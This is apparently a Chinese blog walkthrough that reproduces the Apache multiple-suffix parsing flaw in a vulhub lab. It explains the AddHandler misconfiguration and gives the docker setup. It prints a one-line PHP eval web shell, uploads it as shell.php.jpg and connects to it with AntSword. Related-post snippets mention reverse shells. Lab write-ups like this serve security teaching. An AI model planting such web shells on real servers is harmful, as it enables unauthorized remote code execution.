Apache多后缀名解析漏洞复现(vulhub)

最新推荐文章于 2025-01-05 17:13:52 发布
最新推荐文章于 2025-01-05 17:13:52 发布
阅读量580 收藏 1
点赞数 4
文章标签: apache 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51398553/article/details/131233623
版权
文章介绍了Apache服务器的0x00漏洞原理,该漏洞允许上传以.php为隐藏后缀的文件,如shell.php.jpg,导致文件被当作PHP脚本执行。实验展示了在Kali和CentOS靶机环境中,如何利用此漏洞上传一句话木马并成功连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 漏洞原理

Apache默认一个文件可以有多个以点分割的后缀,Apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别。例如一个文件名为test.jpg.abc,Apache会先从最右边开始识别,也就是会先识别.abc,apache无法识别.abc,继而往左继续识别,发现是.jpg,Apache可以识别,因此会将其识别为图片文件。

0x01 产生原因

配置Apache时,对于Apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录的 conf/docker-php.conf里的配置命令。

AddHandler application/x-httpd-php .php

该命令会将后缀中只要含有.php的文件都会被当作php程序解析。

 查看网页的源代码

 从源代码中可以看出,该网站只允许上传以gif,png,jpg和jpeg为后缀的文件。但由于Apache存在多后缀名解析漏洞,因此我们可以上传一个名为shell.php.jpg的文件,该文件以.jpg在最后的后缀,因此可以上传到网站;又有该文件存在.php,因此最终该文件会被当作php文件执行。

0x02 实验设备

攻击机:kali(192.168.111.139),win11(10.17.42.114)

靶机:centos7(192.168.111.140)

0x03 实验步骤

1. 进入靶场,拉取镜像,并查看服务相关信息。

cd vulhub/httpd/apache_parsing_vulnerability    //进入靶场
docker-compose up -d    //拉取镜像
docker ps    //查看服务相关信息

 可以看到服务的端口号为80。

2. 从本机中访问该服务。

 

3.选择php的一句话木马文件,并将其重命名为shell.php.jpg,然后上传。

<?php @eval($_POST['cmd']); ?>

网页显示上传成功,并且服务中也确实存在该文件

 

 注:进入服务终端的732f89728c1是容器ID,可以通过docker ps命令查看。

4. 尝试使用蚁剑进行连接(连接的url是http://192.168.111.140/uploadfiles/shell.php.jpg,而不是从/var开始)。

连接成功!

 

3. Apache httpd 安全加固之后缀名解析漏洞
薛定谔嘚喵博客
03-31 740
Apache httpd 安全加固之后缀名解析漏洞 漏洞原理:在有多个后缀的情况下,只要一个文件含有.php后缀文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞
11-3 Apache后缀解析漏洞分析
weixin_43263566的博客
11-24 1718
漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到 Apache 解析文件的特性。在默认情况下,Apache 允许一个文件具有多个分割后缀,在处理文件时会从右向左识别后缀名(就是右边的后缀名无法识别,则继续识别左边的)如果运维人员给具有 .php 后缀文件添加了处理程序 AddHandler application/x-httpd-php .php,那么在文件具有多个后缀的情况下,只要文件含有 .php 后缀,该文件就会被识别为 PHP 文件并进行解析
Apache HTTPD 后缀解析漏洞复现
记录笔记
04-15 2802
Apache HTTPD 后缀解析漏洞复现 Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件,利用Apache httpd这个特性,就可以绕过上传文件的白名单。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞 由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀文件即将被识别
Apache文件解析漏洞
@小张小张的博客
10-19 2941
Apache解析漏洞 风险级别:高风险 风险描述:Apache解析文件时当遇到无法识别的扩展名时,将会从后向前解析,直到遇到识别的扩展名为止 风险分析:在控制上传文件时,判断文件名是否是PHP、ASP、ASPX、ASA、CER、ASPX等脚本扩展名,如果是,则不允许上传,防止攻击者上传1.php.rar等扩展名来绕过程序检测,配合解析漏洞,得到webshell; 解析漏洞主要存在于三大WEB服务程序,分别是IIS、NGINX和Apache。 IIS6.0下主要是有两个解析漏洞一个是目录解析,如/x
Apache后缀解析漏洞复现apache_parsing_vulnerability)
爱吃仡坨的Blog
10-13 2417
apahe解析文件时候有一特性,Apache默认一个文件可以有多个分割后缀apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别如果运维人员给.php后缀文件添加了处理程序 `AddHandler application/x-httpd-php .php` 那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为PHP文件进行解析。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞,
Apache 后缀解析漏洞
guishengyx的博客
10-19 471
vulfocus靶场
漏洞复现apache解析漏洞
千寻的博客
08-21 3290
文章目录文件上传-apache解析漏洞原理实验内容漏洞防御免责声明 文件上传-apache解析漏洞 原理 Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断。 比如xxx.php.rar对apache来说 rar是不可解析的,所以就会解析成xxx.php。 Apache并不认识rar后缀名,对它来说会看成test.php。解析成功。 其实漏洞的关键就是apache的"合法后缀",不是"合法后缀"的都可以被非法利用 实验内容 1、访问靶场出现如下界面。进入长传作
06 - vulhub - Apache HTTPD 后缀解析漏洞
2301_82241859的博客
04-12 898
漏洞原理漏洞复现漏洞利用验证漏洞利用是否成功修复建议漏洞名称:Apache HTTPD 后缀解析漏洞简介:httpd是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件。比如,如下配置文件:AddType text/html .htmlAddLanguage zh-CN .cn其
Apache HTTPD 后缀解析漏洞
最新发布
weixin_45534587的博客
01-05 790
Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。以上就是Apache后缀的特性。如果运维人员给.php那么,在有多个后缀的情况下,只要一个文件含有.php后缀文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞
漏洞复现Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1436
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
apache漏洞复现-后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
weixin_64655821的博客
10-13 2228
apache漏洞复现-后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
Apache后缀名解析漏洞分析和防御方法
09-15
主要介绍了Apache后缀名解析漏洞分析和防御方法,后缀解析漏洞通常通过伪造PHP后辍,来上传文件到服务器中,很致命的一漏洞,需要的朋友可以参考下
apache解析漏洞
cxrpty的博客
02-17 1230
实验环境:Apache 实验原理:Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.a.b的“.a”和”.b” 这两种后缀apache不可识别解析,apache就会把test.php.a.b解析成test.php。 实验步骤: 本身存在漏洞: 1.新建一个phpinfo.php.aaa文件,并编辑其内容为下面内容 ...
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 4177
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
描述apache和iis文件解析漏洞的原理,以及如何修复apache文件解析漏洞和iis解析漏洞
weixin_57108799的博客
02-26 691
apache与iis文件解析漏洞原理
vulhub中的Apache HTTPD 后缀解析漏洞详解
qq_59020256的博客
01-04 843
这里需要注意路径,如果你没有执行成功make和make install那么你这里的/bin/python3 路径便会不存在,所有一定要切换到/usr/local/python3/bin/python3进行查看是否存在。这里我就遇到了因为版本过低而执行不了docker-compose up -d的情况。因为我在1.php.jpg中写入的是phpinfo()文件则会执行phpinfo。这里python版本很重要,因为版本过低可能会导致后面的结果运行不成功。(2)创建python3文件夹,存放编译后的下载包。
【中间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 991
①CVE-2017-15715 ②后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
vulhub靶场cve漏洞复现文件上传
01-04
### Vulhub CVE 漏洞复现中的文件上传实验 #### Apache HTTPD 换行解析漏洞(CVE-2017-15715) 在处理文件上传的过程中,Apache HTTPD 的换行符解析存在缺陷。攻击者可以通过精心构造的HTTP请求来绕过安全机制并执行恶意操作[^1]。 对于该漏洞的具体实现方式,在构建测试环境时需准备如下组件: - 安装 Docker 和 Git 工具; - 使用 `git clone` 命令克隆 vulhub 项目仓库到本地机器上; ```bash git clone https://github.com/vulhub/vulhub.git ``` 接着进入对应的漏洞案例路径下启动容器服务: ```bash cd vulhub/httpd/CVE-2017-15715/ docker-compose up -d ``` 完成上述配置之后即可访问指定端口验证是否存在此问题,并尝试通过POST方法提交含有特殊字符的数据包来进行进一步探索。 #### Nginx 解析漏洞下的文件上传场景(CVE-2023-21839) 针对Nginx服务器存在的特定版本解析错误,可以利用其对PHP脚本不当处理的特实施攻击行为。当满足一定条件下,能够使远程未经身份验证的用户向Web应用程序发送特制请求从而获取反序列化对象的能力,最终达到命令注入的效果[^2]。 为了重现这一过程,建议按照官方给出的操作指南搭建模拟平台: 同样先拉取最新版源码库至工作区, ```bash git clone https://github.com/vulhub/vulhub.git ``` 定位到目标位置激活所需的服务实例: ```bash cd vulhub/nginx/CVE-2023-21839/ docker-compose up -d ``` 此时应该能看到一个简易的表单页面允许我们上传任意类型的文档。借助于已公开发布的Exploit工具集可快速获得反弹Shell连接权限。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

leoet18

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值